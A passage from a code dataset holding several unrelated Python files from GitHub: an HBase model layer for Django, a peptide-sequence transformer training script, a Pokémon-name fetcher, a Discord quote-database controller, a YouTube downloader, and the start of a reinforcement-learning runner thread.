{key1: val1, key2: val2} => b\"val1:val2\"\n {key1: val1, key2: val2, key3: val3} => b\"val1:val2:val3\"\n \"\"\"\n field_hash = cls.get_field_hash()\n values = []\n for key in cls.Meta.row_key:\n field = field_hash.get(key)\n if field.column_family: # 也许这个不用了\n continue\n value = data.get(key)\n if value is None:\n if not is_prefix:\n raise BadRowKeyError(f\"{key} is missing in row key\")\n break\n value = cls.serialize_field(field, value)\n if ':' in value:\n raise BadRowKeyError(f\"{key} should not contain ':' in value: {value}\")\n values.append(value)\n return bytes(':'.join(values), encoding='utf-8')\n\n @classmethod\n def deserialize_row_key(cls, row_key):\n \"\"\"\n \"val1\" => {'key1': val1, 'key2': None, 'key3': None}\n \"val1:val2\" => {'key1': val1, 'key2': val2, 'key3': None}\n \"val1:val2:val3\" => {'key1': val1, 'key2': val2, 'key3': val3}\n \"\"\"\n data = {}\n if isinstance(row_key, bytes):\n row_key = row_key.decode('utf-8')\n\n # val1:val2 => val1:val2: 方便每次 find(':') 都能找到一个 val\n row_key = row_key + ':'\n for key in cls.Meta.row_key:\n index = row_key.find(':')\n if index == -1:\n break\n data[key] = cls.deserialize_field(key, row_key[:index])\n row_key = row_key[index + 1:]\n return data\n\n @classmethod\n def serialize_field(cls, field, value):\n value = str(value)\n if isinstance(field, IntegerField):\n # 因为排序规则是按照字典序排序,那么就可能出现 1 10 2 这样的排序\n # 解决的办法是固定 int 的位数为 16 位(8的倍数更容易利用空间),不足位补 0\n value = str(value)\n while len(value) < 16:\n value = '0' + value\n if field.reverse:\n value = value[::-1]\n return value\n\n @classmethod\n def deserialize_field(cls, key, value):\n field = cls.get_field_hash()[key]\n if field.reverse:\n value = value[::-1]\n if field.field_type in [IntegerField.field_type, TimestampField.field_type]:\n return int(value)\n return value\n\n @classmethod\n def serialize_row_data(cls, data):\n row_data = {}\n field_hash = cls.get_field_hash()\n for key, field in field_hash.items():\n if not field.column_family:\n continue\n column_key = '{}:{}'.format(field.column_family, key)\n column_value = data.get(key)\n if column_value is None:\n continue\n row_data[column_key] = cls.serialize_field(field, column_value)\n return row_data\n\n def save(self, batch=None):\n row_data = self.serialize_row_data(self.__dict__)\n if len(row_data) == 0:\n raise EmptyColumnError()\n if batch:\n batch.put(self.row_key, row_data)\n else:\n table = self.get_table()\n table.put(self.row_key, row_data)\n\n @classmethod\n def get(cls, **kwargs):\n row_key = cls.serialize_row_key(kwargs)\n table = cls.get_table()\n row_data = table.row(row_key)\n return cls.init_from_row(row_key, row_data)\n\n @classmethod\n def create(cls, batch=None, **kwargs):\n instance = cls(**kwargs)\n instance.save(batch=batch)\n return instance\n\n @classmethod\n def batch_create(cls, batch_data):\n table = cls.get_table()\n batch = table.batch()\n results = []\n for data in batch_data:\n results.append(cls.create(batch=batch, **data))\n batch.send()\n return results\n\n @classmethod\n def get_table_name(cls):\n if not cls.Meta.table_name:\n raise NotImplementedError('Missing table_name in HBaseModel meta class')\n if settings.TESTING:\n # return 'test_{}'.format(cls.Meta.table_name)\n return f'test_{cls.Meta.table_name}' # 现在流行这么写\n return cls.Meta.table_name\n\n @classmethod\n def drop_table(cls):\n if not settings.TESTING:\n raise Exception('You can not drop table outside of unit tests')\n conn = HBaseClient.get_connection()\n conn.delete_table(cls.get_table_name(), True)\n\n @classmethod\n def create_table(cls):\n if not settings.TESTING:\n raise Exception('You can not create table outside of unit tests')\n conn = HBaseClient.get_connection()\n # convert table name from bytes to str\n tables = [table.decode('utf-8') for table in conn.tables()]\n if cls.get_table_name() in tables:\n return\n column_families = {\n field.column_family: dict()\n for key, field in cls.get_field_hash().items()\n if field.column_family is not None\n }\n conn.create_table(cls.get_table_name(), column_families)\n\n # 实现一个 get_or_create 的方法,返回 (instance, created)\n\n @classmethod\n def serialize_row_key_from_tuple(cls, row_key_tuple):\n if row_key_tuple is None:\n return None\n data = {\n key: value\n for key, value in zip(cls.Meta.row_key, row_key_tuple)\n }\n return cls.serialize_row_key(data, is_prefix=True)\n\n @classmethod\n def filter(cls, start=None, stop=None, prefix=None, limit=None, reverse=False):\n # serialize tuple to str\n row_start = cls.serialize_row_key_from_tuple(start)\n row_stop = cls.serialize_row_key_from_tuple(stop)\n row_prefix = cls.serialize_row_key_from_tuple(prefix)\n\n # scan table\n table = cls.get_table()\n rows = table.scan(row_start, row_stop, row_prefix, limit=limit, reverse=reverse)\n\n # deserialize to instance list\n results = []\n for row_key, row_data in rows:\n instance = cls.init_from_row(row_key, row_data)\n results.append(instance)\n return results\n\n @classmethod\n def delete(cls, **kwargs):\n row_key = cls.serialize_row_key(kwargs)\n table = cls.get_table()\n return table.delete(row_key)", "repo_name": "joyu-ai/django-twitter", "sub_path": "django_hbase/models/hbase_models.py", "file_name": "hbase_models.py", "file_ext": "py", "file_size_in_byte": 7972, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django_hbase.client.HBaseClient.get_connection", "line_number": 14, "usage_type": "call"}, {"api_name": "django_hbase.client.HBaseClient", "line_number": 14, "usage_type": "name"}, {"api_name": "fields.HBaseField", "line_number": 27, "usage_type": "argument"}, {"api_name": "exceptions.BadRowKeyError", "line_number": 65, "usage_type": "call"}, {"api_name": "exceptions.BadRowKeyError", "line_number": 69, "usage_type": "call"}, {"api_name": "fields.IntegerField", "line_number": 97, "usage_type": "argument"}, {"api_name": "fields.IntegerField.field_type", "line_number": 112, "usage_type": "attribute"}, {"api_name": "fields.IntegerField", "line_number": 112, "usage_type": "name"}, {"api_name": "fields.TimestampField.field_type", "line_number": 112, "usage_type": "attribute"}, {"api_name": "fields.TimestampField", "line_number": 112, "usage_type": "name"}, {"api_name": "exceptions.EmptyColumnError", "line_number": 133, "usage_type": "call"}, {"api_name": "django.conf.settings.TESTING", "line_number": 167, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 167, "usage_type": "name"}, {"api_name": "django.conf.settings.TESTING", "line_number": 174, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 174, "usage_type": "name"}, {"api_name": "django_hbase.client.HBaseClient.get_connection", "line_number": 176, "usage_type": "call"}, {"api_name": "django_hbase.client.HBaseClient", "line_number": 176, "usage_type": "name"}, {"api_name": "django.conf.settings.TESTING", "line_number": 181, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 181, "usage_type": "name"}, {"api_name": "django_hbase.client.HBaseClient.get_connection", "line_number": 183, "usage_type": "call"}, {"api_name": "django_hbase.client.HBaseClient", "line_number": 183, "usage_type": "name"}]} +{"seq_id": "12429861819", "text": "from gensim.models import KeyedVectors\nimport pandas as pd\nimport numpy as np\nimport time\nimport tensorflow as tf\nimport Transformer as tfr\n\nnum_shape = 512\n\nion_w2v = KeyedVectors.load_word2vec_format(\"ion_w2v\")\namino_w2v = KeyedVectors.load_word2vec_format(\"amino_w2v\")\ndata = pd.read_csv(\"data.csv\")\nprint(len(data[\"mz\"]))\nprint(len(data[\"seq\"]))\nmz_mx_len = 0\nseq_mx_len = 0\nfor i in data[\"mz\"]:\n mz_array = np.fromstring(i[1:-1], dtype=float, sep=' ')\n mz_mx_len = max(mz_mx_len,len(mz_array))\n\nfor i in data[\"seq\"]:\n seq_mx_len = max(seq_mx_len,len(i))\nseq_mx_len += 2\nzero = []\nfor i in range(num_shape):\n zero.append(0)\ninput_array = []\noutput_array = []\ncnt = 0\ntotal = len(data[\"mz\"])\nload_count = np.zeros((101))\nmx_val = 0\nfor i in data[\"mz\"]:\n mz_array = np.fromstring(i[1:-1], dtype=float, sep=' ')\n vv = []\n for p in mz_array:\n rval = p * 10\n rval = round(rval)\n mx_val = max(mx_val,rval)\n vv.append(rval)\n diff = mz_mx_len - len(mz_array)\n for p in range(diff):\n vv.append(0)\n input_array.append(vv)\n if cnt%50 == 0:\n per = int(round((cnt*100/total)))\n if per%10 == 0 and load_count[per] == 0:\n print(\"{} % process....\".format(round(cnt*100/total),-1))\n load_count[per] = 1\n cnt = cnt + 1\n\nprint(\"Succes input array\")\ntime.sleep(1)\n\nload_count = np.zeros((101))\ncnt = 0\nfor i in data[\"seq\"]:\n vv = []\n vv.append(1)\n for p in i:\n vv.append(ord(p)-ord('A') + 3)\n vv.append(2)\n diff = seq_mx_len - len(i) - 2\n for p in range(diff):\n vv.append(0)\n output_array.append(vv)\n if cnt%50 == 0:\n per = int(round((cnt*100/total)))\n if per %10 == 0 and load_count[per] == 0:\n print(\"{} % process....\".format(round(cnt * 100 / total), -1))\n load_count[per] = 1\n cnt = cnt + 1\n\nprint(\"Success output array\")\n\nprint(\"input size : {} , output size :{}\".format(len(input_array),len(output_array)))\n\nprint(\"go into Transformer\")\ntime.sleep(1)\n\nprint(\"max_value : {}\".format(mx_val))\ndmodel = 512\nnum_layer = 6\nnum_head = 8\ndff = 2048\ndropout = 0.3\ninput_size = 20000\noutput_size = 30\nepoch = 20\nBATCH_SIZE = 20\nBUFFER_SIZE = 20000\ninput_array = np.array(input_array)\noutput_array = np.array(output_array)\n\nATCH_SIZE = 64\nBUFFER_SIZE = 20000\nprint(seq_mx_len)\ndataset = tf.data.Dataset.from_tensor_slices((\n {\n 'inputs': input_array,\n 'dec_inputs': output_array[:, :-1]\n },\n {\n 'outputs': output_array[:, 1:]\n },\n))\n\ndataset = dataset.cache()\ndataset = dataset.shuffle(BUFFER_SIZE)\ndataset = dataset.batch(BATCH_SIZE)\ndataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\ntf.keras.backend.clear_session()\nmodel = tfr.transformer(vocab_size=input_size,\n num_layers=num_layer,\n dff=dff,\n d_model=dmodel,\n num_heads=num_head,\n dropout=dropout)\nlearning_rate = tfr.CustomSchedule(dmodel)\n\noptimizer = tf.keras.optimizers.Adam(\n learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)\n\ndef loss_function(y_true, y_pred):\n y_true = tf.reshape(y_true, shape=(-1, seq_mx_len - 1))\n\n loss = tf.keras.losses.SparseCategoricalCrossentropy(\n from_logits=True, reduction='none')(y_true, y_pred)\n\n mask = tf.cast(tf.not_equal(y_true, 0), tf.float32)\n loss = tf.multiply(loss, mask)\n\n return tf.reduce_mean(loss)\n\ndef accuracy(y_true, y_pred):\n print(y_true)\n y_true = tf.reshape(y_true, shape=(-1, seq_mx_len - 1))\n return tf.keras.metrics.sparse_categorical_accuracy(y_true, y_pred)\n\nmodel.compile(optimizer=optimizer, loss=loss_function, metrics=[accuracy])\nmodel.fit(dataset,epochs=epoch)", "repo_name": "dtc03012/Peptide_Search", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3725, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "gensim.models.KeyedVectors.load_word2vec_format", "line_number": 10, "usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors", "line_number": 10, "usage_type": "name"}, {"api_name": "gensim.models.KeyedVectors.load_word2vec_format", "line_number": 11, "usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors", "line_number": 11, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 55, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 111, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.backend.clear_session", "line_number": 113, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 113, "usage_type": "attribute"}, {"api_name": "Transformer.transformer", "line_number": 114, "usage_type": "call"}, {"api_name": "Transformer.CustomSchedule", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 128, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 128, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 131, "usage_type": "attribute"}, {"api_name": "tensorflow.multiply", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.sparse_categorical_accuracy", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 139, "usage_type": "attribute"}]} +{"seq_id": "71442091369", "text": "import requests\nimport random\n\n# Define the API endpoint for Pokemon names\napi_endpoint = \"https://pokeapi.co/api/v2/pokemon/?limit=1118\"\n\n# Make a request to the API and get the JSON response\nresponse = requests.get(api_endpoint).json()\n\n# Extract the list of Pokemon names from the response\npokemon_names = [pokemon['name'] for pokemon in response['results']]\n\n# Get a random Pokemon name from the list\nrandom_pokemon = random.choice(pokemon_names)\n\n# Capitalize the first letter of the Pokemon name\ncapitalized_pokemon = random_pokemon.capitalize()\n\n# Print the result\n# print(capitalized_pokemon)\n", "repo_name": "Shields003/pythonNPC", "sub_path": "getPokemon.py", "file_name": "getPokemon.py", "file_ext": "py", "file_size_in_byte": 601, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "30724153739", "text": "import logging\nfrom datetime import datetime\nfrom typing import List, Union\n\nimport discord\nfrom sqlalchemy import orm\n\n# noinspection PyUnresolvedReferences\nfrom kaztron.driver import database as db\nfrom kaztron.cog.quotedb.model import *\nfrom kaztron.driver.database import make_error_handler_decorator, func\nfrom kaztron.utils.discord import extract_user_id\n\nlogger = logging.getLogger(__name__)\n\ndb_file = 'quotedb.sqlite'\n\nengine = None\nSession = db.sessionmaker()\nsession = None\n\n\nclass UserNotFound(RuntimeError):\n pass\n\n\ndef init_db():\n global engine, session\n engine = db.make_sqlite_engine(db_file)\n Session.configure(bind=engine)\n session = Session()\n Base.metadata.create_all(engine)\n\n\non_error_rollback = make_error_handler_decorator(lambda *args, **kwargs: session, logger)\n\n\ndef query_user(server: discord.Server, id_: str):\n \"\"\"\n Find a user given an ID string passed by command, or create it if it does not exist.\n\n id_ can be passed to a command as a discord mention ``<@123456789012345678>`` or\n ``<@!123456789012345678>``, or as a Discord ID ``123456789012345678`` (various malformed\n inputs may also be accepted, e.g., ``@123456789012345678``).\n\n For Discord Mention or Discord ID, if the user is not found but exists on Discord, a new\n entry is created. In other cases, a :cls:`~.UserNotFound` error is raised.\n\n :raises UserNotFound: User was not found. Either the Discord user exists neither on Discord\n nor in the database, or a database ID was passed and could not be found.\n :raises discord.HTTPException: Discord API error occurred\n :raises db.exc.MultipleResultsFound: Should never happen - database is buggered.\n \"\"\"\n\n # Parse the passed ID\n try:\n discord_id = extract_user_id(id_)\n except discord.InvalidArgument:\n raise ValueError('Invalid Discord user ID format')\n logger.debug('query_user: passed Discord ID: {}'.format(discord_id))\n\n # Check if user exists\n try:\n db_user = session.query(User).filter_by(discord_id=discord_id).one()\n except db.orm_exc.MultipleResultsFound:\n logger.exception(\"Er, mate, I think we've got a problem here. \"\n \"The database is buggered.\")\n raise\n except db.orm_exc.NoResultFound:\n logger.debug('query_user: user not found, creating user')\n member = server.get_member(discord_id) # type: discord.Member\n if member is None:\n raise UserNotFound('Discord user not found')\n db_user = create_user(member)\n logger.debug('query_user: created user: {!r}'.format(db_user))\n else:\n logger.debug('query_user: found user: {!r}'.format(db_user))\n\n member = server.get_member(discord_id) # type: discord.Member\n if member:\n update_nicknames(db_user, member)\n else:\n logger.warning(\"Can't find user {!r} on Discord, skipping update nicknames\"\n .format(db_user))\n\n return db_user\n\n\n@on_error_rollback\ndef create_user(member: discord.Member) -> User:\n db_user = User(\n discord_id=member.id,\n name=member.nick if member.nick else member.name,\n username=member.name\n )\n session.add(db_user)\n session.commit()\n return db_user\n\n\ndef search_users(query: str) -> List[User]:\n \"\"\"\n Search for users.\n :param query: The substring to search for.\n :return:\n \"\"\"\n search_term_like = '%{}%'.format(query.replace('%', '\\\\%').replace('_', '\\\\_'))\n # noinspection PyUnresolvedReferences\n results = session.query(User) \\\n .filter(db.or_(User.name.ilike(search_term_like, escape='\\\\'),\n User.username.ilike(search_term_like, escape='\\\\'))) \\\n .order_by(User.name) \\\n .all()\n try:\n results[0]\n except IndexError:\n raise UserNotFound\n logger.info(\"search_users: Found {:d} results for {!r}\".format(len(results), query))\n return results\n\n\ndef random_quote() -> Quote:\n return session.query(Quote).order_by(func.random()).limit(1).one()\n\n\ndef get_total_quotes() -> int:\n return session.query(Quote).count()\n\n\ndef get_total_quoted_users() -> int:\n total = db.func.count(Quote.quote_id).label('total')\n return session.query(User).join(User.quotes).having(total > 0).group_by(User.user_id).count()\n\n\ndef get_top_quoted(num: int=3) -> List[Quote]:\n total = db.func.count(Quote.quote_id).label('total')\n return session.query(User, total).join(User.quotes) \\\n .group_by(Quote.author_id).order_by(db.desc(total)).limit(num).all()\n\n\ndef get_top_saved(num: int=3) -> List[Quote]:\n total = db.func.count(Quote.quote_id).label('total')\n return session.query(User, total).join(User.saved_quotes) \\\n .group_by(Quote.saved_by_id).order_by(db.desc(total)).limit(num).all()\n\n\ndef search_quotes(search_term: str=None, user: Union[User, List[User]]=None) -> List[Quote]:\n \"\"\"\n Fulltext search for quotes.\n :param search_term: The substring to search for.\n :param user: optional user to filter by\n \"\"\"\n\n if not user and not search_term:\n raise ValueError(\"Must specify at least 1 search criterion\")\n\n if user:\n user_list = [user] if isinstance(user, User) else user # type: List[User]\n else:\n user_list = []\n\n query = session.query(Quote)\n if user_list:\n # noinspection PyUnresolvedReferences\n query = query.filter(Quote.author_id.in_(u.user_id for u in user_list))\n\n if search_term:\n search_term_like = db.format_like(search_term)\n # noinspection PyUnresolvedReferences\n query = query.filter(Quote.message.ilike(search_term_like, escape='\\\\'))\n\n results = query.order_by(Quote.timestamp).all()\n try:\n results[0]\n except IndexError:\n raise orm.exc.NoResultFound\n logger.info(\"search_quotes: Found {:d} results for search_term={}, user_list={}\"\n .format(len(results), search_term, ','.join(u.name for u in user_list)))\n return results\n\n\n@on_error_rollback\ndef store_quote(\n user: User,\n saved_by: User,\n channel_id: str,\n message: str,\n timestamp: datetime=None):\n \"\"\"\n Store a new quote.\n :param user: Author of the note.\n :param saved_by: User who initiated storage of this note.\n :param channel_id: Channel in which the quote was said.\n :param message: User's message to retain as a quote.\n :param timestamp: Time at which quote was said (or stored, if unavailable).\n :return:\n \"\"\"\n if timestamp is None:\n timestamp = datetime.utcnow()\n\n logger.info(\"Inserting quote by {}...\".format(user))\n logger.debug(\"store_quote: user={!s} saved_by={!s} timestamp={} message={!r}\"\n .format(user, saved_by, timestamp.isoformat(' '), message))\n quote = Quote(\n timestamp=timestamp, author=user, saved_by=saved_by, channel_id=channel_id, message=message\n )\n session.add(quote)\n session.commit()\n return quote\n\n\n@on_error_rollback\ndef update_nicknames(user: User, member: discord.Member):\n \"\"\"\n Update a user's nicknames and usernames.\n \"\"\"\n logger.debug(\"update_nicknames: Updating names: {!r}...\".format(user))\n user.name = member.nick if member.nick else member.name\n user.username = member.name\n session.commit()\n logger.info(\"update_nicknames: Updated names: {!r}\".format(user))\n\n\n@on_error_rollback\ndef remove_quotes(quotes: List[Quote]):\n \"\"\"\n Delete a quote object from the database.\n \"\"\"\n for quote in quotes:\n logger.info(\"remove_quotes: Deleting quote {!r}...\".format(quote))\n session.delete(quote)\n session.commit()\n", "repo_name": "Worldbuilding/kaztron", "sub_path": "kaztron/cog/quotedb/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 7635, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "kaztron.driver.database.sessionmaker", "line_number": 19, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 19, "usage_type": "name"}, {"api_name": "kaztron.driver.database.make_sqlite_engine", "line_number": 29, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 29, "usage_type": "name"}, {"api_name": "kaztron.driver.database.make_error_handler_decorator", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.Server", "line_number": 38, "usage_type": "attribute"}, {"api_name": "kaztron.utils.discord.extract_user_id", "line_number": 57, "usage_type": "call"}, {"api_name": "discord.InvalidArgument", "line_number": 58, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database.orm_exc", "line_number": 65, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 65, "usage_type": "name"}, {"api_name": "kaztron.driver.database.orm_exc", "line_number": 69, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 69, "usage_type": "name"}, {"api_name": "discord.Member", "line_number": 90, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database.or_", "line_number": 110, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 110, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 101, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.random", "line_number": 123, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 123, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.count", "line_number": 131, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 131, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 131, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.count", "line_number": 136, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 136, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 136, "usage_type": "name"}, {"api_name": "kaztron.driver.database.desc", "line_number": 138, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 135, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.count", "line_number": 142, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 142, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 142, "usage_type": "name"}, {"api_name": "kaztron.driver.database.desc", "line_number": 144, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 144, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 147, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 147, "usage_type": "name"}, {"api_name": "kaztron.driver.database.format_like", "line_number": 168, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 168, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.exc", "line_number": 176, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm", "line_number": 176, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 188, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 199, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 199, "usage_type": "name"}, {"api_name": "discord.Member", "line_number": 213, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 225, "usage_type": "name"}]} +{"seq_id": "71197424487", "text": "from pytube import YouTube\nimport os\nimport asyncio\n\n# link = \"https://youtu.be/EAYlckSaviI\"\nlink = input(\"Enter the link for the Youtube video to download: \")\n\ndownloadThisResolution = None\n\nyt = YouTube(link)\n\n# Create a folder with the name of playlist and execute the download code after navigating to the new Directory\ncurrentDir = os.getcwd()\n# print(currentDir)\nif(os.path.exists(f\"{currentDir}\\{yt.title}\")):\n print(f\"Folder {yt.title} already exists\")\n print(f\"Folder changed to {yt.title}\")\n os.chdir(yt.title) #Change directory\nelse: \n os.mkdir(yt.title) \t#Make directory\n os.chdir(yt.title)\n print(f\"Folder {yt.title} created\")\n print(f\"Folder changed to {yt.title}\")\n# print(os.getcwd())\n\nprint(f\"Downloading video: {yt.title}\")\n\n# get all the available resolutions of a video\npixels = yt.streams\navailableResolutions = list(enumerate(pixels))\nfor pix in availableResolutions:\n # print(pix)\n checkRes = str(pix[1])\n # print(checkRes)\n if(len(checkRes.split(\"720p\"))>1 and len(checkRes.split(\"video/mp4\"))>1 and len(checkRes.split(\"progressive=\\\"True\\\"\"))>1):\n print(pix[0])\n downloadThisResolution = pix[0]\n\n# print()\n# print(downloadThisResolution)\nasyncio.wait_for(pixels[downloadThisResolution].download())\nprint(f\"Video {yt.title} downloaded successfully!\")", "repo_name": "ManthanDhole/Youtube-Download-UtilityCode", "sub_path": "Single_YoutubeVideo_Downloader.py", "file_name": "Single_YoutubeVideo_Downloader.py", "file_ext": "py", "file_size_in_byte": 1331, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytube.YouTube", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 18, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 20, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 21, "usage_type": "call"}, {"api_name": "asyncio.wait_for", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "10306042367", "text": "from helpers import PartialRollout\nimport threading\nimport six.moves.queue as queue\nimport tensorflow as tf\nimport pdb\nfrom collections import deque\nfrom demonstration_manager import DemonstrationManager\nimport numpy as np\n\nclass RunnerThread(threading.Thread):\n \"\"\"\nOne of the key distinctions between a normal environment and a universe environment\nis that a universe environment is _real time_. This means that there should be a thread\nthat would constantly interact with the environment and tell it what to do. This thread is here.\n\"\"\"\n def __init__(self, env, policy, num_local_steps, visualise, reward_f = None,record = False,shared=False,enemy = False):\n threading.Thread.__init__(self)\n self.record = record\n self.queue = queue.Queue(5)\n self.num_local_steps = num_local_steps\n self.env = env\n self.last_features = None\n self.policy = policy\n self.daemon = True\n self.sess = None\n self.shared=shared\n self.same_colours = enemy\n\n self.summary_writer = None\n self.visualise = visualise\n self.reward_f = reward_f\n\n def start_runner(self, sess, summary_writer):\n self.sess = sess\n self.summary_writer = summary_writer\n self.start()\n\n def run(self):\n with self.sess.as_default():\n self._run()\n\n def _run(self):\n if self.record:\n rollout_provider = recording_runner(self.env, self.policy, self.num_local_steps, self.summary_writer,\n self.visualise)\n else:\n #rollout_provider = conv_runner(self.env, self.policy, self.num_local_steps, self.summary_writer, self.visualise,reward_f=self.reward_f,shared=self.shared)\n rollout_provider = self.runner()\n while True:\n # the timeout variable exists because apparently, if one worker dies, the other workers\n # won't die with it, unless the timeout is set to some large number. This is an empirical\n # observation.\n\n self.queue.put(next(rollout_provider), timeout=600.0)\n\n\n def runner(self):\n\n \"\"\"\n The logic of the thread runner. In brief, it constantly keeps on running\n the policy, and as long as the rollout exceeds a certain length, the thread\n runner appends the policy to the queue.\n \"\"\"\n\n # ok so theres a bunch of options here. Theres a record mode. a convolution or lstm option for both policy and reward function\n # skip the recording part for now such that the two run similarly.\n ## Define here the configuration of the whole thing.\n\n external_reward = self.reward_f is not None\n shared = hasattr(self.policy,\"shared\")\n policy_type = self.policy.type\n reward_type = self.reward_f.type if external_reward else None\n\n last_state = self.env.reset()\n last_features = self.policy.get_initial_features() if self.policy.type =='lstm' else [None]\n\n if external_reward:\n if shared is False and reward_type=='lstm':\n r_features = self.reward_f.get_initial_features()\n elif shared is True and reward_type=='lstm':\n last_features,r_features = self.policy.get_initial_features()\n else:\n r_features =[None]\n\n if reward_type == 'conv':\n r_mem_size = self.reward_f.mem_size\n r_obs = np.zeros(self.reward_f.ob_space[:-1] + (r_mem_size,))\n else:\n r_obs = last_state\n irl_rewards = []\n\n if policy_type == 'conv':\n p_mem_size = self.policy.mem_size\n p_obs = np.zeros(self.policy.ob_space[:-1] + (p_mem_size,))\n else:\n p_obs = last_state\n\n\n length = 0\n rewards = 0\n\n while True:\n terminal_end = False\n rollout = PartialRollout()\n for _ in range(self.num_local_steps):\n\n if policy_type=='conv':\n p_obs[:, :, :p_mem_size - 1] = p_obs[:, :, 1:p_mem_size]\n p_obs[:, :, -1] = last_state[:, :, 0]\n elif policy_type=='lstm':\n p_obs = last_state\n fetched = self.policy.act([p_obs], *last_features)\n action, value_, = fetched[0], fetched[1]\n features = fetched[2:] if policy_type =='lstm' else [None]\n\n # argmax to convert from one-hot\n state, reward, terminal, info = self.env.step(action.argmax())\n if self.same_colours:\n wh = np.where(state > np.amin(state))\n state[wh[0], wh[1]] = 0.6\n actual_reward = reward\n if self.visualise:\n self.env.render()\n\n if external_reward:\n # If there is an external reward function use that.\n if reward_type == 'conv':\n r_obs[:, :, :r_mem_size - 1] = r_obs[:, :, 1:r_mem_size]\n r_obs[:, :, -1] = last_state[:, :, 0]\n else:\n r_obs = last_state\n\n r_fetched = 